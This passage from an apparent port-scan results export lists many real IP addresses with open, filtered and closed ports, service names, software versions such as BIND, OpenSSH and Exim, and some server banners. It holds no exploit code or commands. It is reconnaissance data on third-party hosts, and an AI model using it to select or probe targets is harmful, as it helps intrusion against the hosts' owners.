8798149.126.72.220 18039 tcp tcpwrapped open
8799149.126.72.220 18040 tcp tcpwrapped open
8800149.126.72.220 18041 tcp tcpwrapped open
8801149.126.72.220 18042 tcp tcpwrapped open
8802149.126.72.220 18043 tcp tcpwrapped open
8803149.126.72.220 18044 tcp tcpwrapped open
8804149.126.72.220 18045 tcp tcpwrapped open
8805149.126.72.220 18046 tcp tcpwrapped open
8806149.126.72.220 18047 tcp tcpwrapped open
8807149.126.72.220 18048 tcp tcpwrapped open
8808149.126.72.220 18049 tcp tcpwrapped open
8809149.126.72.220 18050 tcp tcpwrapped open
8810149.126.72.220 18051 tcp tcpwrapped open
8811149.126.72.220 18052 tcp tcpwrapped open
8812149.126.72.220 18053 tcp tcpwrapped open
8813149.126.72.220 18054 tcp tcpwrapped open
8814149.126.72.220 18055 tcp tcpwrapped open
8815149.126.72.220 18056 tcp tcpwrapped open
8816149.126.72.220 18057 tcp tcpwrapped open
8817149.126.72.220 18058 tcp tcpwrapped open
8818149.126.72.220 18059 tcp tcpwrapped open
8819149.126.72.220 18060 tcp tcpwrapped open
8820149.126.72.220 18061 tcp tcpwrapped open
8821149.126.72.220 18062 tcp tcpwrapped open
8822149.126.72.220 18063 tcp tcpwrapped open
8823149.126.72.220 18064 tcp tcpwrapped open
8824149.126.72.220 18065 tcp tcpwrapped open
8825149.126.72.220 18066 tcp tcpwrapped open
8826149.126.72.220 18067 tcp tcpwrapped open
8827149.126.72.220 18068 tcp tcpwrapped open
8828149.126.72.220 18069 tcp tcpwrapped open
8829149.126.72.220 18070 tcp tcpwrapped open
8830149.126.72.220 18071 tcp tcpwrapped open
8831149.126.72.220 18072 tcp tcpwrapped open
8832149.126.72.220 18073 tcp tcpwrapped open
8833149.126.72.220 18074 tcp tcpwrapped open
8834149.126.72.220 18075 tcp tcpwrapped open
8835149.126.72.220 18076 tcp tcpwrapped open
8836149.126.72.220 18077 tcp tcpwrapped open
8837149.126.72.220 18078 tcp tcpwrapped open
8838149.126.72.220 18079 tcp tcpwrapped open
8839149.126.72.220 18080 tcp tcpwrapped open
8840149.126.72.220 18081 tcp tcpwrapped open
8841149.126.72.220 18082 tcp tcpwrapped open
8842149.126.72.220 18083 tcp tcpwrapped open
8843149.126.72.220 18084 tcp tcpwrapped open
8844149.126.72.220 18085 tcp tcpwrapped open
8845149.126.72.220 18086 tcp tcpwrapped open
8846149.126.72.220 18087 tcp tcpwrapped open
8847149.126.72.220 18088 tcp tcpwrapped open
8848149.126.72.220 18089 tcp tcpwrapped open
8849149.126.72.220 18090 tcp tcpwrapped open
8850149.126.72.220 18091 tcp tcpwrapped open
8851149.126.72.220 18092 tcp tcpwrapped open
8852149.126.72.220 18093 tcp tcpwrapped open
8853149.126.72.220 18094 tcp tcpwrapped open
8854149.126.72.220 18095 tcp tcpwrapped open
8855149.126.72.220 18096 tcp tcpwrapped open
8856149.126.72.220 18097 tcp tcpwrapped open
8857149.126.72.220 18098 tcp tcpwrapped open
8858149.126.72.220 18099 tcp tcpwrapped open
8859149.126.72.220 18100 tcp tcpwrapped open
8860149.126.72.220 18101 tcp tcpwrapped open
8861149.126.72.220 18102 tcp tcpwrapped open
8862149.126.72.220 18103 tcp tcpwrapped open
8863149.126.72.220 18104 tcp tcpwrapped open
8864149.126.72.220 18105 tcp tcpwrapped open
8865149.126.72.220 18106 tcp tcpwrapped open
8866149.126.72.220 18107 tcp tcpwrapped open
8867149.126.72.220 18108 tcp tcpwrapped open
8868149.126.72.220 18109 tcp tcpwrapped open
8869149.126.72.220 18110 tcp tcpwrapped open
8870149.126.72.220 18111 tcp tcpwrapped open
8871149.126.72.220 18112 tcp tcpwrapped open
8872149.126.72.220 18113 tcp tcpwrapped open
8873149.126.72.220 18200 tcp tcpwrapped open
8874149.126.72.220 18239 tcp tcpwrapped open
8875149.126.72.220 18443 tcp tcpwrapped open
8876149.126.72.220 18802 tcp tcpwrapped open
8877149.126.72.220 19013 tcp tcpwrapped open
8878149.126.72.220 19014 tcp tcpwrapped open
8879149.126.72.220 19015 tcp tcpwrapped open
8880149.126.72.220 19016 tcp tcpwrapped open
8881149.126.72.220 19017 tcp tcpwrapped open
8882149.126.72.220 19022 tcp tcpwrapped open
8883149.126.72.220 19080 tcp tcpwrapped open
8884149.126.72.220 19082 tcp tcpwrapped open
8885149.126.72.220 19084 tcp tcpwrapped open
8886149.126.72.220 19443 tcp tcpwrapped open
8887149.126.72.220 20000 tcp tcpwrapped open
8888149.126.72.220 20001 tcp tcpwrapped open
8889149.126.72.220 20010 tcp tcpwrapped open
8890149.126.72.220 20020 tcp tcpwrapped open
8891149.126.72.220 20030 tcp tcpwrapped open
8892149.126.72.220 20040 tcp tcpwrapped open
8893149.126.72.220 20050 tcp tcpwrapped open
8894149.126.72.220 20053 tcp tcpwrapped open
8895149.126.72.220 20060 tcp tcpwrapped open
8896149.126.72.220 20070 tcp tcpwrapped open
8897149.126.72.220 20080 tcp tcpwrapped open
8898149.126.72.220 20082 tcp tcpwrapped open
8899149.126.72.220 20084 tcp tcpwrapped open
8900149.126.72.220 20090 tcp tcpwrapped open
8901149.126.72.220 20100 tcp tcpwrapped open
8902149.126.72.220 20106 tcp tcpwrapped open
8903149.126.72.220 20107 tcp tcpwrapped open
8904149.126.72.220 20110 tcp tcpwrapped open
8905149.126.72.220 20150 tcp tcpwrapped open
8906149.126.72.220 20182 tcp tcpwrapped open
8907149.126.72.220 20184 tcp tcpwrapped open
8908149.126.72.220 20185 tcp tcpwrapped open
8909149.126.72.220 20200 tcp tcpwrapped open
8910149.126.72.220 20208 tcp tcpwrapped open
8911149.126.72.220 20325 tcp tcpwrapped open
8912149.126.72.220 20500 tcp tcpwrapped open
8913149.126.72.220 20512 tcp tcpwrapped open
8914149.126.72.220 20600 tcp tcpwrapped open
8915149.126.72.220 20800 tcp tcpwrapped open
8916149.126.72.220 20892 tcp tcpwrapped open
8917149.126.72.220 20894 tcp tcpwrapped open
8918149.126.72.220 20900 tcp tcpwrapped open
8919149.126.72.220 21081 tcp tcpwrapped open
8920149.126.72.220 21082 tcp tcpwrapped open
8921149.126.72.220 21083 tcp tcpwrapped open
8922149.126.72.220 21084 tcp tcpwrapped open
8923149.126.72.220 21100 tcp tcpwrapped open
8924149.126.72.220 21200 tcp tcpwrapped open
8925149.126.72.220 21300 tcp tcpwrapped open
8926149.126.72.220 21357 tcp tcpwrapped open
8927149.126.72.220 21381 tcp tcpwrapped open
8928149.126.72.220 21400 tcp tcpwrapped open
8929149.126.72.220 21500 tcp tcpwrapped open
8930149.126.72.220 21935 tcp tcpwrapped open
8931149.126.72.220 22082 tcp tcpwrapped open
8932149.126.72.220 22084 tcp tcpwrapped open
8933149.126.72.220 22103 tcp tcpwrapped open
8934149.126.72.220 22107 tcp tcpwrapped open
8935149.126.72.220 22206 tcp tcpwrapped open
8936149.126.72.220 22345 tcp tcpwrapped open
8937149.126.72.220 22403 tcp tcpwrapped open
8938149.126.72.220 22609 tcp tcpwrapped open
8939149.126.72.220 22703 tcp tcpwrapped open
8940149.126.72.220 22705 tcp tcpwrapped open
8941149.126.72.220 23082 tcp tcpwrapped open
8942149.126.72.220 23084 tcp tcpwrapped open
8943149.126.72.220 23182 tcp tcpwrapped open
8944149.126.72.220 23184 tcp tcpwrapped open
8945149.126.72.220 24082 tcp tcpwrapped open
8946149.126.72.220 24084 tcp tcpwrapped open
8947149.126.72.220 24472 tcp tcpwrapped open
8948149.126.72.220 24510 tcp tcpwrapped open
8949149.126.72.220 25000 tcp tcpwrapped open
8950149.126.72.220 25001 tcp tcpwrapped open
8951149.126.72.220 25002 tcp tcpwrapped open
8952149.126.72.220 25003 tcp tcpwrapped open
8953149.126.72.220 25004 tcp tcpwrapped open
8954149.126.72.220 25005 tcp tcpwrapped open
8955149.126.72.220 25006 tcp tcpwrapped open
8956149.126.72.220 25007 tcp tcpwrapped open
8957149.126.72.220 25008 tcp tcpwrapped open
8958149.126.72.220 25009 tcp tcpwrapped open
8959149.126.72.220 25010 tcp tcpwrapped open
8960149.126.72.220 25082 tcp tcpwrapped open
8961149.126.72.220 25084 tcp tcpwrapped open
8962149.126.72.220 25782 tcp tcpwrapped open
8963149.126.72.220 25952 tcp tcpwrapped open
8964149.126.72.220 27571 tcp tcpwrapped open
8965149.126.72.220 28001 tcp tcpwrapped open
8966149.126.72.220 28080 tcp tcpwrapped open
8967149.126.72.220 28818 tcp tcpwrapped open
8968149.126.72.220 29798 tcp tcpwrapped open
8969149.126.72.220 29799 tcp tcpwrapped open
8970149.126.72.220 30000 tcp tcpwrapped open
8971149.126.72.220 30001 tcp tcpwrapped open
8972149.126.72.220 30003 tcp tcpwrapped open
8973149.126.72.220 30005 tcp tcpwrapped open
8974149.126.72.220 30007 tcp tcpwrapped open
8975149.126.72.220 30009 tcp tcpwrapped open
8976149.126.72.220 30011 tcp tcpwrapped open
8977149.126.72.220 30013 tcp tcpwrapped open
8978149.126.72.220 30015 tcp tcpwrapped open
8979149.126.72.220 30017 tcp tcpwrapped open
8980149.126.72.220 30019 tcp tcpwrapped open
8981149.126.72.220 30021 tcp tcpwrapped open
8982149.126.72.220 30050 tcp tcpwrapped open
8983149.126.72.220 30106 tcp tcpwrapped open
8984149.126.72.220 30110 tcp tcpwrapped open
8985149.126.72.220 30111 tcp tcpwrapped open
8986149.126.72.220 30112 tcp tcpwrapped open
8987149.126.72.220 30113 tcp tcpwrapped open
8988149.126.72.220 30120 tcp tcpwrapped open
8989149.126.72.220 30121 tcp tcpwrapped open
8990149.126.72.220 30122 tcp tcpwrapped open
8991149.126.72.220 30123 tcp tcpwrapped open
8992149.126.72.220 30452 tcp tcpwrapped open
8993149.126.72.220 30468 tcp tcpwrapped open
8994149.126.72.220 30473 tcp tcpwrapped open
8995149.126.72.220 30479 tcp tcpwrapped open
8996149.126.72.220 30501 tcp tcpwrapped open
8997149.126.72.220 30700 tcp tcpwrapped open
8998149.126.72.220 30701 tcp tcpwrapped open
8999149.126.72.220 30892 tcp tcpwrapped open
9000149.126.72.220 30894 tcp tcpwrapped open
9001149.126.72.220 31337 tcp tcpwrapped open
9002149.126.72.220 32101 tcp tcpwrapped open
9003149.126.72.220 32102 tcp tcpwrapped open
9004149.126.72.220 32202 tcp tcpwrapped open
9005149.126.72.220 32303 tcp tcpwrapped open
9006149.126.72.220 32443 tcp tcpwrapped open
9007149.126.72.220 32444 tcp tcpwrapped open
9008149.126.72.220 32746 tcp tcpwrapped open
9009149.126.72.220 32800 tcp tcpwrapped open
9010149.126.72.220 34225 tcp tcpwrapped open
9011149.126.72.220 34500 tcp tcpwrapped open
9012149.126.72.220 35522 tcp tcpwrapped open
9013149.126.72.220 35524 tcp tcpwrapped open
9014149.126.72.220 35531 tcp tcpwrapped open
9015149.126.72.220 35554 tcp tcpwrapped open
9016149.126.72.220 35559 tcp tcpwrapped open
9017149.126.72.220 35560 tcp tcpwrapped open
9018149.126.72.220 36982 tcp tcpwrapped open
9019149.126.72.220 36983 tcp tcpwrapped open
9020149.126.72.220 36984 tcp tcpwrapped open
9021149.126.72.220 37080 tcp tcpwrapped open
9022149.126.72.220 38880 tcp tcpwrapped open
9023149.126.72.220 39001 tcp tcpwrapped open
9024149.126.72.220 40070 tcp tcpwrapped open
9025149.126.72.220 40099 tcp tcpwrapped open
9026149.126.72.220 40892 tcp tcpwrapped open
9027149.126.72.220 40894 tcp tcpwrapped open
9028149.126.72.220 42208 tcp tcpwrapped open
9029149.126.72.220 42424 tcp tcpwrapped open
9030149.126.72.220 42901 tcp tcpwrapped open
9031149.126.72.220 43008 tcp tcpwrapped open
9032149.126.72.220 43009 tcp tcpwrapped open
9033149.126.72.220 43200 tcp tcpwrapped open
9034149.126.72.220 44100 tcp tcpwrapped open
9035149.126.72.220 44300 tcp tcpwrapped open
9036149.126.72.220 44301 tcp tcpwrapped open
9037149.126.72.220 44302 tcp tcpwrapped open
9038149.126.72.220 44303 tcp tcpwrapped open
9039149.126.72.220 44304 tcp tcpwrapped open
9040149.126.72.220 44305 tcp tcpwrapped open
9041149.126.72.220 44306 tcp tcpwrapped open
9042149.126.72.220 44307 tcp tcpwrapped open
9043149.126.72.220 44308 tcp tcpwrapped open
9044149.126.72.220 44309 tcp tcpwrapped open
9045149.126.72.220 44310 tcp tcpwrapped open
9046149.126.72.220 44320 tcp tcpwrapped open
9047149.126.72.220 44332 tcp tcpwrapped open
9048149.126.72.220 44333 tcp tcpwrapped open
9049149.126.72.220 44334 tcp tcpwrapped open
9050149.126.72.220 44336 tcp tcpwrapped open
9051149.126.72.220 44337 tcp tcpwrapped open
9052149.126.72.220 44340 tcp tcpwrapped open
9053149.126.72.220 44341 tcp tcpwrapped open
9054149.126.72.220 44345 tcp tcpwrapped open
9055149.126.72.220 44400 tcp tcpwrapped open
9056149.126.72.220 44410 tcp tcpwrapped open
9057149.126.72.220 44420 tcp tcpwrapped open
9058149.126.72.220 45000 tcp tcpwrapped open
9059149.126.72.220 45555 tcp tcpwrapped open
9060149.126.72.220 45666 tcp tcpwrapped open
9061149.126.72.220 45667 tcp tcpwrapped open
9062149.126.72.220 45668 tcp tcpwrapped open
9063149.126.72.220 45677 tcp tcpwrapped open
9064149.126.72.220 45777 tcp tcpwrapped open
9065149.126.72.220 45788 tcp tcpwrapped open
9066149.126.72.220 45821 tcp tcpwrapped open
9067149.126.72.220 45886 tcp tcpwrapped open
9068149.126.72.220 45888 tcp tcpwrapped open
9069149.126.72.220 46000 tcp tcpwrapped open
9070149.126.72.220 46443 tcp tcpwrapped open
9071149.126.72.220 46862 tcp tcpwrapped open
9072149.126.72.220 47000 tcp tcpwrapped open
9073149.126.72.220 47080 tcp tcpwrapped open
9074149.126.72.220 47534 tcp tcpwrapped open
9075149.126.72.220 48888 tcp tcpwrapped open
9076149.126.72.220 48889 tcp tcpwrapped open
9077149.126.72.220 49200 tcp tcpwrapped open
9078149.126.72.220 49210 tcp tcpwrapped open
9079149.126.72.220 49443 tcp tcpwrapped open
9080149.126.72.220 49682 tcp tcpwrapped open
9081149.126.72.220 49684 tcp tcpwrapped open
9082149.126.72.220 49686 tcp tcpwrapped open
9083149.126.72.220 49688 tcp tcpwrapped open
9084149.126.72.220 49690 tcp tcpwrapped open
9085149.126.72.220 49692 tcp tcpwrapped open
9086149.126.72.220 49694 tcp tcpwrapped open
9087149.126.72.220 50000 tcp tcpwrapped open
9088149.126.72.220 50001 tcp tcpwrapped open
9089149.126.72.220 50042 tcp tcpwrapped open
9090149.126.72.220 50050 tcp tcpwrapped open
9091149.126.72.220 50073 tcp tcpwrapped open
9092149.126.72.220 50085 tcp tcpwrapped open
9093149.126.72.220 50101 tcp tcpwrapped open
9094149.126.72.220 50102 tcp tcpwrapped open
9095149.126.72.220 50103 tcp tcpwrapped open
9096149.126.72.220 50104 tcp tcpwrapped open
9097149.126.72.220 50105 tcp tcpwrapped open
9098149.126.72.220 50106 tcp tcpwrapped open
9099149.126.72.220 50107 tcp tcpwrapped open
9100149.126.72.220 50112 tcp tcpwrapped open
9101149.126.72.220 50113 tcp tcpwrapped open
9102149.126.72.220 50122 tcp tcpwrapped open
9103149.126.72.220 50160 tcp tcpwrapped open
9104149.126.72.220 50443 tcp tcpwrapped open
9105149.126.72.220 51002 tcp tcpwrapped open
9106149.126.72.220 51003 tcp tcpwrapped open
9107149.126.72.220 51434 tcp tcpwrapped open
9108149.126.72.220 52010 tcp tcpwrapped open
9109149.126.72.220 52230 tcp tcpwrapped open
9110149.126.72.220 52311 tcp tcpwrapped open
9111149.126.72.220 52536 tcp tcpwrapped open
9112149.126.72.220 53480 tcp tcpwrapped open
9113149.126.72.220 53481 tcp tcpwrapped open
9114149.126.72.220 53482 tcp tcpwrapped open
9115149.126.72.220 53483 tcp tcpwrapped open
9116149.126.72.220 53484 tcp tcpwrapped open
9117149.126.72.220 53485 tcp tcpwrapped open
9118149.126.72.220 53490 tcp tcpwrapped open
9119149.126.72.220 53805 tcp tcpwrapped open
9120149.126.72.220 53806 tcp tcpwrapped open
9121149.126.72.220 54327 tcp tcpwrapped open
9122149.126.72.220 54490 tcp tcpwrapped open
9123149.126.72.220 54545 tcp tcpwrapped open
9124149.126.72.220 55055 tcp tcpwrapped open
9125149.126.72.220 55080 tcp tcpwrapped open
9126149.126.72.220 55081 tcp tcpwrapped open
9127149.126.72.220 55350 tcp tcpwrapped open
9128149.126.72.220 55388 tcp tcpwrapped open
9129149.126.72.220 55470 tcp tcpwrapped open
9130149.126.72.220 55475 tcp tcpwrapped open
9131149.126.72.220 55481 tcp tcpwrapped open
9132149.126.72.220 55490 tcp tcpwrapped open
9133149.126.72.220 57778 tcp tcpwrapped open
9134149.126.72.220 57779 tcp tcpwrapped open
9135149.126.72.220 57780 tcp tcpwrapped open
9136149.126.72.220 57781 tcp tcpwrapped open
9137149.126.72.220 57782 tcp tcpwrapped open
9138149.126.72.220 57783 tcp tcpwrapped open
9139149.126.72.220 57784 tcp tcpwrapped open
9140149.126.72.220 57785 tcp tcpwrapped open
9141149.126.72.220 57786 tcp tcpwrapped open
9142149.126.72.220 57787 tcp tcpwrapped open
9143149.126.72.220 57788 tcp tcpwrapped open
9144149.126.72.220 58443 tcp tcpwrapped open
9145149.126.72.220 58585 tcp tcpwrapped open
9146149.126.72.220 59012 tcp tcpwrapped open
9147149.126.72.220 59443 tcp tcpwrapped open
9148149.126.72.220 60021 tcp tcpwrapped open
9149149.126.72.220 60023 tcp tcpwrapped open
9150149.126.72.220 60443 tcp tcpwrapped open
9151149.126.72.220 62080 tcp tcpwrapped open
9152149.126.72.220 62237 tcp tcpwrapped open
9153149.126.72.220 62443 tcp tcpwrapped open
9154149.126.72.220 62865 tcp tcpwrapped open
9155149.126.72.220 63443 tcp tcpwrapped open
9156149.126.72.220 64477 tcp tcpwrapped open
9157149.126.72.220 64671 tcp tcpwrapped open
9158151.106.38.107 21 tcp ftp open 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 1 of 50 allowed.\x0d\x0a220-Local time is now 12:11. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a
9159151.106.38.107 53 tcp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
9160151.106.38.107 53 udp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
9161151.106.38.107 67 tcp dhcps filtered
9162151.106.38.107 67 udp dhcps unknown
9163151.106.38.107 68 tcp dhcpc filtered
9164151.106.38.107 68 udp dhcpc unknown
9165151.106.38.107 69 tcp tftp filtered
9166151.106.38.107 69 udp tftp unknown
9167151.106.38.107 88 tcp kerberos-sec filtered
9168151.106.38.107 88 udp kerberos-sec unknown
9169151.106.38.107 123 tcp ntp filtered
9170151.106.38.107 123 udp ntp unknown
9171151.106.38.107 137 tcp netbios-ns filtered
9172151.106.38.107 137 udp netbios-ns unknown
9173151.106.38.107 138 tcp netbios-dgm filtered
9174151.106.38.107 138 udp netbios-dgm unknown
9175151.106.38.107 139 tcp netbios-ssn filtered
9176151.106.38.107 139 udp netbios-ssn unknown
9177151.106.38.107 161 tcp snmp filtered
9178151.106.38.107 161 udp snmp unknown
9179151.106.38.107 162 tcp snmptrap filtered
9180151.106.38.107 162 udp snmptrap unknown
9181151.106.38.107 389 tcp ldap filtered
9182151.106.38.107 389 udp ldap unknown
9183151.106.38.107 520 tcp efs filtered
9184151.106.38.107 520 udp route unknown
9185151.106.38.107 2049 tcp nfs filtered
9186151.106.38.107 2049 udp nfs unknown
9187158.69.13.254 22 tcp ssh open OpenSSH 7.4 protocol 2.0
9188158.69.13.254 25 tcp smtp open Exim smtpd 4.92.3
9189158.69.13.254 53 tcp domain open unknown banner: get lost
9190158.69.13.254 53 udp domain open unknown banner: get lost
9191158.69.13.254 67 tcp dhcps filtered
9192158.69.13.254 67 udp dhcps unknown
9193158.69.13.254 68 tcp dhcpc filtered
9194158.69.13.254 68 udp dhcpc unknown
9195158.69.13.254 69 tcp tftp filtered
9196158.69.13.254 69 udp tftp unknown
9197158.69.13.254 80 tcp http open nginx
9198158.69.13.254 88 tcp kerberos-sec filtered
9199158.69.13.254 88 udp kerberos-sec unknown
9200158.69.13.254 123 tcp ntp filtered
9201158.69.13.254 123 udp ntp unknown
9202158.69.13.254 137 tcp netbios-ns filtered
9203158.69.13.254 137 udp netbios-ns unknown
9204158.69.13.254 138 tcp netbios-dgm filtered
9205158.69.13.254 138 udp netbios-dgm unknown
9206158.69.13.254 139 tcp netbios-ssn filtered
9207158.69.13.254 139 udp netbios-ssn unknown
9208158.69.13.254 161 tcp snmp filtered
9209158.69.13.254 161 udp snmp unknown
9210158.69.13.254 162 tcp snmptrap filtered
9211158.69.13.254 162 udp snmptrap unknown
9212158.69.13.254 389 tcp ldap filtered
9213158.69.13.254 389 udp ldap unknown
9214158.69.13.254 443 tcp ssl/http open nginx
9215158.69.13.254 465 tcp ssl/smtp open Exim smtpd 4.92.3
9216158.69.13.254 520 tcp efs filtered
9217158.69.13.254 520 udp route unknown
9218158.69.13.254 587 tcp smtp open Exim smtpd 4.92.3
9219158.69.13.254 2049 tcp nfs filtered
9220158.69.13.254 2049 udp nfs unknown
9221158.69.13.254 2525 tcp smtp open Exim smtpd 4.92.3
9222158.69.13.254 3306 tcp mysql open MySQL blocked - too many connection errors
9223162.244.35.13 22 tcp ssh open SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
9224162.244.35.13 25 tcp open
9225162.244.35.13 53 tcp domain open ISC BIND 9.10.6
9226162.244.35.13 53 udp domain open ISC BIND 9.10.6
9227162.244.35.13 67 tcp dhcps closed
9228162.244.35.13 67 udp dhcps closed
9229162.244.35.13 68 tcp dhcpc closed
9230162.244.35.13 68 udp dhcpc closed
9231162.244.35.13 69 tcp tftp closed
9232162.244.35.13 69 udp tftp closed
9233162.244.35.13 88 tcp kerberos-sec closed
9234162.244.35.13 88 udp kerberos-sec closed
9235162.244.35.13 123 tcp ntp closed
9236162.244.35.13 123 udp ntp closed
9237162.244.35.13 137 tcp netbios-ns filtered
9238162.244.35.13 137 udp netbios-ns unknown
9239162.244.35.13 138 tcp netbios-dgm filtered
9240162.244.35.13 138 udp netbios-dgm unknown
9241162.244.35.13 139 tcp netbios-ssn filtered
9242162.244.35.13 139 udp netbios-ssn unknown
9243162.244.35.13 161 tcp snmp closed
9244162.244.35.13 161 udp snmp closed
9245162.244.35.13 162 tcp snmptrap closed
9246162.244.35.13 162 udp snmptrap closed
9247162.244.35.13 389 tcp ldap closed
9248162.244.35.13 389 udp ldap closed
9249162.244.35.13 520 tcp efs closed
9250162.244.35.13 520 udp route closed
9251162.244.35.13 2049 tcp nfs closed
9252162.244.35.13 2049 udp nfs closed
9253163.247.48.46 53 tcp domain filtered
9254163.247.48.46 53 udp domain unknown
9255163.247.48.46 67 tcp dhcps filtered
9256163.247.48.46 67 udp dhcps unknown
9257163.247.48.46 68 tcp dhcpc filtered
9258163.247.48.46 68 udp dhcpc unknown
9259163.247.48.46 69 tcp tftp filtered
9260163.247.48.46 69 udp tftp unknown
9261163.247.48.46 88 tcp kerberos-sec filtered
9262163.247.48.46 88 udp kerberos-sec unknown
9263163.247.48.46 123 tcp ntp filtered
9264163.247.48.46 123 udp ntp unknown
9265163.247.48.46 137 tcp netbios-ns filtered
9266163.247.48.46 137 udp netbios-ns unknown
9267163.247.48.46 138 tcp netbios-dgm filtered
9268163.247.48.46 138 udp netbios-dgm unknown
9269163.247.48.46 139 tcp netbios-ssn filtered
9270163.247.48.46 139 udp netbios-ssn unknown
9271163.247.48.46 161 tcp snmp filtered
9272163.247.48.46 161 udp snmp unknown
9273163.247.48.46 162 tcp snmptrap filtered
9274163.247.48.46 162 udp snmptrap unknown
9275163.247.48.46 389 tcp ldap filtered
9276163.247.48.46 389 udp ldap unknown
9277163.247.48.46 520 tcp efs filtered
9278163.247.48.46 520 udp route unknown
9279163.247.48.46 2049 tcp nfs filtered
9280163.247.48.46 2049 udp nfs unknown
9281163.247.127.20 53 tcp domain filtered
9282163.247.127.20 53 udp domain unknown
9283163.247.127.20 67 tcp dhcps filtered
9284163.247.127.20 67 udp dhcps unknown
9285163.247.127.20 68 tcp dhcpc filtered
9286163.247.127.20 68 udp dhcpc unknown
9287163.247.127.20 69 tcp tftp filtered
9288163.247.127.20 69 udp tftp unknown
9289163.247.127.20 88 tcp kerberos-sec filtered
9290163.247.127.20 88 udp kerberos-sec unknown
9291163.247.127.20 123 tcp ntp filtered
9292163.247.127.20 123 udp ntp unknown
9293163.247.127.20 137 tcp netbios-ns filtered
9294163.247.127.20 137 udp netbios-ns unknown
9295163.247.127.20 138 tcp netbios-dgm filtered
9296163.247.127.20 138 udp netbios-dgm unknown
9297163.247.127.20 139 tcp netbios-ssn filtered
9298163.247.127.20 139 udp netbios-ssn unknown
9299163.247.127.20 161 tcp snmp filtered
9300163.247.127.20 161 udp snmp unknown
9301163.247.127.20 162 tcp snmptrap filtered
9302163.247.127.20 162 udp snmptrap unknown
9303163.247.127.20 389 tcp ldap filtered
9304163.247.127.20 389 udp ldap unknown
9305163.247.127.20 520 tcp efs filtered
9306163.247.127.20 520 udp route unknown
9307163.247.127.20 2049 tcp nfs filtered
9308163.247.127.20 2049 udp nfs unknown
9309163.247.130.114 53 tcp domain closed
9310163.247.130.114 53 udp domain unknown
9311163.247.130.114 67 tcp dhcps filtered
9312163.247.130.114 67 udp dhcps unknown
9313163.247.130.114 68 tcp dhcpc filtered
9314163.247.130.114 68 udp dhcpc unknown
9315163.247.130.114 69 tcp tftp filtered
9316163.247.130.114 69 udp tftp closed
9317163.247.130.114 88 tcp kerberos-sec filtered
9318163.247.130.114 88 udp kerberos-sec unknown
9319163.247.130.114 123 tcp ntp filtered
9320163.247.130.114 123 udp ntp unknown
9321163.247.130.114 137 tcp netbios-ns filtered
9322163.247.130.114 137 udp netbios-ns unknown
9323163.247.130.114 138 tcp netbios-dgm filtered
9324163.247.130.114 138 udp netbios-dgm unknown
9325163.247.130.114 139 tcp netbios-ssn filtered
9326163.247.130.114 139 udp netbios-ssn unknown
9327163.247.130.114 161 tcp snmp filtered
9328163.247.130.114 161 udp snmp open net-snmp; net-snmp SNMPv3 server
9329163.247.130.114 162 tcp snmptrap filtered
9330163.247.130.114 162 udp snmptrap unknown
9331163.247.130.114 389 tcp ldap filtered
9332163.247.130.114 389 udp ldap unknown
9333163.247.130.114 520 tcp efs filtered
9334163.247.130.114 520 udp route unknown
9335163.247.130.114 2049 tcp nfs filtered
9336163.247.130.114 2049 udp nfs unknown
9337163.247.175.176 53 tcp tcpwrapped open
9338163.247.175.176 53 udp domain unknown
9339163.247.175.176 67 tcp tcpwrapped open
9340163.247.175.176 67 udp dhcps unknown
9341163.247.175.176 68 tcp tcpwrapped open
9342163.247.175.176 68 udp dhcpc unknown
9343163.247.175.176 69 tcp tcpwrapped open
9344163.247.175.176 69 udp tftp unknown
9345163.247.175.176 88 tcp tcpwrapped open
9346163.247.175.176 88 udp kerberos-sec unknown
9347163.247.175.176 123 tcp tcpwrapped open
9348163.247.175.176 123 udp ntp unknown
9349163.247.175.176 137 tcp tcpwrapped open
9350163.247.175.176 137 udp netbios-ns unknown
9351163.247.175.176 138 tcp tcpwrapped open
9352163.247.175.176 138 udp netbios-dgm unknown
9353163.247.175.176 139 udp netbios-ssn unknown
9354163.247.175.176 161 tcp tcpwrapped open
9355163.247.175.176 161 udp snmp unknown
9356163.247.175.176 162 tcp tcpwrapped open
9357163.247.175.176 162 udp snmptrap unknown
9358163.247.175.176 389 tcp tcpwrapped open
9359163.247.175.176 389 udp ldap unknown
9360163.247.175.176 520 tcp tcpwrapped open
9361163.247.175.176 520 udp route unknown
9362163.247.175.176 2049 tcp tcpwrapped open
9363163.247.175.176 2049 udp nfs unknown
9364165.22.143.229 53 tcp domain closed
9365165.22.143.229 53 udp domain unknown
9366165.22.143.229 67 tcp dhcps closed
9367165.22.143.229 67 udp dhcps unknown
9368165.22.143.229 68 tcp dhcpc closed
9369165.22.143.229 68 udp dhcpc unknown
9370165.22.143.229 69 tcp tftp closed
9371165.22.143.229 69 udp tftp closed
9372165.22.143.229 88 tcp kerberos-sec closed
9373165.22.143.229 88 udp kerberos-sec unknown
9374165.22.143.229 123 tcp ntp closed
9375165.22.143.229 123 udp ntp open NTP v4 secondary server
9376165.22.143.229 137 tcp netbios-ns closed
9377165.22.143.229 137 udp netbios-ns closed
9378165.22.143.229 138 tcp netbios-dgm closed
9379165.22.143.229 138 udp netbios-dgm closed
9380165.22.143.229 139 tcp netbios-ssn closed
9381165.22.143.229 139 udp netbios-ssn unknown
9382165.22.143.229 161 tcp snmp closed
9383165.22.143.229 161 udp snmp closed
9384165.22.143.229 162 tcp snmptrap closed
9385165.22.143.229 162 udp snmptrap unknown
9386165.22.143.229 389 tcp ldap closed
9387165.22.143.229 389 udp ldap closed
9388165.22.143.229 520 tcp efs closed
9389165.22.143.229 520 udp route closed
9390165.22.143.229 2049 tcp nfs closed
9391165.22.143.229 2049 udp nfs closed
9392165.227.99.239 53 tcp domain filtered
9393165.227.99.239 53 udp domain unknown
9394165.227.99.239 67 tcp dhcps filtered
9395165.227.99.239 67 udp dhcps unknown
9396165.227.99.239 68 tcp dhcpc filtered
9397165.227.99.239 68 udp dhcpc unknown
9398165.227.99.239 69 tcp tftp filtered
9399165.227.99.239 69 udp tftp unknown
9400165.227.99.239 80 tcp http open nginx
9401165.227.99.239 88 tcp kerberos-sec filtered
9402165.227.99.239 88 udp kerberos-sec unknown
9403165.227.99.239 123 tcp ntp filtered
9404165.227.99.239 123 udp ntp unknown
9405165.227.99.239 137 tcp netbios-ns filtered
